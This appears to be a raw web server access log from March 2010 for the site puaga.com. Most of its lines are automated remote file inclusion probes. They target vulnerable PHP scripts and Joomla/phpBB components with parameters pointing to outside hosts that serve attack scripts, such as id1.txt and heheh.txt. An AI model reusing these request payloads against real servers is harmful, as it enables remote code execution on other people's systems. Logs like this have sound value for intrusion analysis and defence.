78.110.50.112 - - [03/Mar/2010:09:09:04 -0800] "GET /logs/access_100206.log%20%20//errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:09:04 -0800] "GET /errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:09:04 -0800] "GET /logs//errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:09:05 -0800] "GET /logs/access_100206.log//errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:09:05 -0800] "GET /errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:09:06 -0800] "GET /logs//errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:09:10:11 -0800] "GET /logs/access_100201.log//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [03/Mar/2010:09:10:18 -0800] "GET /logs/access_100201.log//Savant2_Plugin_stylesheet.php?mosConfig_absolute_p%20ath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:10:33 -0800] "GET /logs/access_100203.log%20%20/index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:10:36 -0800] "GET /logs/access_100126.log%20%20//errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:10:37 -0800] "GET /index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:11:06 -0800] "GET /errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:11:06 -0800] "GET /logs/access_100206.log//errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:11:06 -0800] "GET /logs//errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:11:07 -0800] "GET /logs/access_100128.log%20%20//ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:11:07 -0800] "GET /ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:11:12 -0800] "GET /ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:11:12 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:11:13 -0800] "GET /logs/access_100128.log%20%20//ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:11:26 -0800] "GET /logs/access_100219.log%20%20//ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:11:26 -0800] "GET /logs/access_100219.log%20%20//ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.112 - - [03/Mar/2010:09:12:15 -0800] "GET /logs/access_100126.log//errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:12:36 -0800] "GET /ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:12:36 -0800] "GET /logs/access_100128.log%20%20//ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:13:11 -0800] "GET /logs/access_100219.log%20%20//ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:13:16 -0800] "GET /ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:13:16 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:13:16 -0800] "GET /logs/access_100128.log%20%20//ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.97 - - [03/Mar/2010:09:13:28 -0800] "GET /module/ HTTP/1.0" 200 1362 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
200.93.147.154 - - [03/Mar/2010:09:13:43 -0800] "GET /logs/view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:13:43 -0800] "GET /logs/access_100213.log%20%20/view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:13:47 -0800] "GET /logs/access_100219.log%20%20//ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:14:07 -0800] "GET /logs/view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:14:07 -0800] "GET /logs/access_100213.log%20%20/view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:14:08 -0800] "GET /view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:14:22 -0800] "GET /logs/view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:14:22 -0800] "GET /view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:09:14:24 -0800] "GET /logs/access_100220.log//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:14:29 -0800] "GET /view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:14:29 -0800] "GET /logs/view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:14:29 -0800] "GET /logs/access_100213.log%20%20/view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:15:05 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:15:05 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:15:05 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:15:14 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:15:14 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:15:14 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:15:36 -0800] "GET /logs/access_100209.log%20%20/view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:15:39 -0800] "GET /logs/access_100209.log%20%20/view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:15:42 -0800] "GET /logs/access_100211.log%20%20//components/com_forum/download.php?phpbb_root_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:15:47 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:15:47 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:15:47 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:09:16:26 -0800] "GET /logs/index.php?stranica=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:09:16:27 -0800] "GET /index.php?stranica=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:09:16:31 -0800] "GET /logs/access_100131.log%20%20/index.php?stranica=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:09:16:33 -0800] "GET /logs/index.php?stranica=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:09:16:34 -0800] "GET /index.php?stranica=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:09:16:37 -0800] "GET /logs/access_100131.log%20%20/index.php?stranica=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:09:17:09 -0800] "GET /logs/access_100225.log%20%20/index.php?stranica=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:09:17:16 -0800] "GET /logs/access_100225.log%20%20/index.php?stranica=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:17:24 -0800] "GET /logs/access_100209.log%20%20/view.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:18:32 -0800] "GET /logs/access_100211.log//components/com_forum/download.php?phpbb_root_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.12.239 - - [03/Mar/2010:09:18:54 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.12.239 - - [03/Mar/2010:09:18:54 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.12.239 - - [03/Mar/2010:09:18:55 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:09:19:05 -0800] "GET /logs/access_100131.log/index.php?stranica=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:09:19:11 -0800] "GET /logs/access_100225.log/index.php?stranica=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:19:11 -0800] "GET /logs/access_100224.log/index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:09:19:34 -0800] "GET /logs/access_100131.log/index.php?stranica=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:19:45 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:19:50 -0800] "GET /logs/access_100128.log//ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:09:20:01 -0800] "GET /logs/access_100219.log//ashnews.php?pathtoashnews=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.12.239 - - [03/Mar/2010:09:20:03 -0800] "GET /logs/access_100211.log//components/com_forum/download.php?phpbb_root_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:09:20:03 -0800] "GET /logs/access_100225.log/index.php?stranica=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:09:23:42 -0800] "GET /logs//common-tpl-vars.php?confdir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:09:23:42 -0800] "GET /logs/access_100126.log//common-tpl-vars.php?confdir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:09:23:42 -0800] "GET /common-tpl-vars.php?confdir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.191.37.245 - - [03/Mar/2010:09:24:21 -0800] "GET /logs/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.191.37.245 - - [03/Mar/2010:09:24:21 -0800] "GET /become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.191.37.245 - - [03/Mar/2010:09:24:21 -0800] "GET /logs/access_100218.log/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.191.37.245 - - [03/Mar/2010:09:24:28 -0800] "GET /logs/access_100218.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.191.37.245 - - [03/Mar/2010:09:24:33 -0800] "GET /logs/access_100203.log/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.191.37.245 - - [03/Mar/2010:09:24:57 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.191.37.245 - - [03/Mar/2010:09:24:58 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.191.37.245 - - [03/Mar/2010:09:25:04 -0800] "GET /logs/access_100219.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:09:25:05 -0800] "GET /logs//common-tpl-vars.php?confdir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:09:25:05 -0800] "GET /common-tpl-vars.php?confdir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:09:25:05 -0800] "GET /logs/access_100126.log//common-tpl-vars.php?confdir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:09:25:19 -0800] "GET /logs//common-tpl-vars.php?confdir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:09:25:19 -0800] "GET /logs/access_100126.log//common-tpl-vars.php?confdir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:09:25:19 -0800] "GET /common-tpl-vars.php?confdir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:09:25:45 -0800] "GET /logs/access_100130.log//common-tpl-vars.php?confdir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.119 - - [03/Mar/2010:09:25:52 -0800] "GET /logs/access_100130.log//common-tpl-vars.php?confdir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:09:26:42 -0800] "GET /ashnews.php?pathtoashnews=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:09:26:42 -0800] "GET /logs//ashnews.php?pathtoashnews=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:09:26:42 -0800] "GET /logs//ashnews.php?pathtoashnews=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:09:26:42 -0800] "GET /logs/access_100210.log%20%20//ashnews.php?pathtoashnews=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:09:26:42 -0800] "GET /logs/access_100210.log%20%20//ashnews.php?pathtoashnews=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:09:26:42 -0800] "GET /ashnews.php?pathtoashnews=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:09:27:22 -0800] "GET /logs/access_100210.log//ashnews.php?pathtoashnews=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:09:27:24 -0800] "GET /logs/access_100210.log//ashnews.php?pathtoashnews=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:09:27:58 -0800] "GET /logs/access_100204.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:09:27:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [03/Mar/2010:09:27:58 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.200.89.25 - - [03/Mar/2010:09:30:41 -0800] "GET /logs/access_100126.log//bbs/skin/melygallery/error.php?dir=http://canaldoserralheiro.com.br/laknat/lkt.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.200.89.25 - - [03/Mar/2010:09:30:41 -0800] "GET /bbs/skin/melygallery/error.php?dir=http://canaldoserralheiro.com.br/laknat/lkt.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.200.89.25 - - [03/Mar/2010:09:30:41 -0800] "GET /logs//bbs/skin/melygallery/error.php?dir=http://canaldoserralheiro.com.br/laknat/lkt.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.82.114.106 - - [03/Mar/2010:09:30:43 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [03/Mar/2010:09:30:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [03/Mar/2010:09:30:43 -0800] "GET /logs/access_100204.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:09:31:03 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:31:20 -0800] "GET /logs/access_100219.log/config.inc.php?mosConfig_absolute_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:31:20 -0800] "GET /config.inc.php?mosConfig_absolute_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.193.197.59 - - [03/Mar/2010:09:31:20 -0800] "GET /logs/config.inc.php?mosConfig_absolute_path=http://move2korea.com/data/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:09:31:30 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:09:31:40 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [03/Mar/2010:09:32:24 -0800] "GET /logs/access_100116.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:09:32:40 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.5.166 - - [03/Mar/2010:09:32:56 -0800] "GET //setup.php?dir=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:09:33:06 -0800] "GET /logs/access_100211.log//components/com_forum/download.php?phpbb_root_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:09:33:43 -0800] "GET /logs/access_100211.log//components/com_forum/download.php?phpbb_root_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [03/Mar/2010:09:36:52 -0800] "GET /logs/access_100128.log%20%20/index.php?option=com_jcalpro&mosConfig.absolute.path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [03/Mar/2010:09:36:52 -0800] "GET /logs/index.php?option=com_jcalpro&mosConfig.absolute.path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
